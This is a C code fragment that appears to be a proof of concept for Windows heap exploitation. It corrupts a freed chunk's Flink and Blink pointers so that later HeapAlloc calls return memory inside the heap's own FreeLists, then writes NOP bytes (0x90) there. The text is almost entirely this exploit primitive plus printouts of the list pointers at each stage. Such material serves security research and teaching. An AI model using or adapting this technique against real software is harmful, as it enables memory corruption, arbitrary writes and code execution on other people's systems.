#define ALLOC_SIZE 64
#define INDEX_A (ALLOC_SIZE>>3)
#define INDEX_B ((ALLOC_SIZE>>3)+1)

HEAP_FREE_ENTRY *chunk;

p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
chunk = (HEAP_FREE_ENTRY *)(p - sizeof(HEAP_ENTRY));
FillLookasideList(pHeap, ALLOC_SIZE);
HeapFree(pHeap, 0, p);
EmptyLookasideList(pHeap, ALLOC_SIZE);

printf("before overwrite:\n");
printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_A], pHeap->FreeLists[INDEX_A].Flink, pHeap->FreeLists[INDEX_A].Blink);
printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_B], pHeap->FreeLists[INDEX_B].Flink, pHeap->FreeLists[INDEX_B].Blink);
printf("chunk    [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", chunk, chunk->FreeList.Flink, chunk->FreeList.Blink);

chunk->FreeList.Flink = (LIST_ENTRY *)(&pHeap->FreeLists[INDEX_A].Blink);
chunk->FreeList.Blink = (LIST_ENTRY *)(&pHeap->FreeLists[INDEX_B].Blink);
printf("\nafter overwrite:\n");
printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_A], pHeap->FreeLists[INDEX_A].Flink, pHeap->FreeLists[INDEX_A].Blink);
printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_B], pHeap->FreeLists[INDEX_B].Flink, pHeap->FreeLists[INDEX_B].Blink);
printf("chunk    [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", chunk, chunk->FreeList.Flink, chunk->FreeList.Blink);

p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
printf("\nafter 1st alloc (returned 0x%08lx):\n", p);
printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_A], pHeap->FreeLists[INDEX_A].Flink, pHeap->FreeLists[INDEX_A].Blink);
printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_B], pHeap->FreeLists[INDEX_B].Flink, pHeap->FreeLists[INDEX_B].Blink);

p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
printf("\nafter 2nd alloc (returned 0x%08lx):\n", p);
printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_A], pHeap->FreeLists[INDEX_A].Flink, pHeap->FreeLists[INDEX_A].Blink);
printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_B], pHeap->FreeLists[INDEX_B].Flink, pHeap->FreeLists[INDEX_B].Blink);
printf("Copying 0x909090909090909090 into new chunk\n");
memset(p, 0x90, 12);
printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_A], pHeap->FreeLists[INDEX_A].Flink, pHeap->FreeLists[INDEX_A].Blink);
printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_B], pHeap->FreeLists[INDEX_B].Flink, pHeap->FreeLists[INDEX_B].Blink);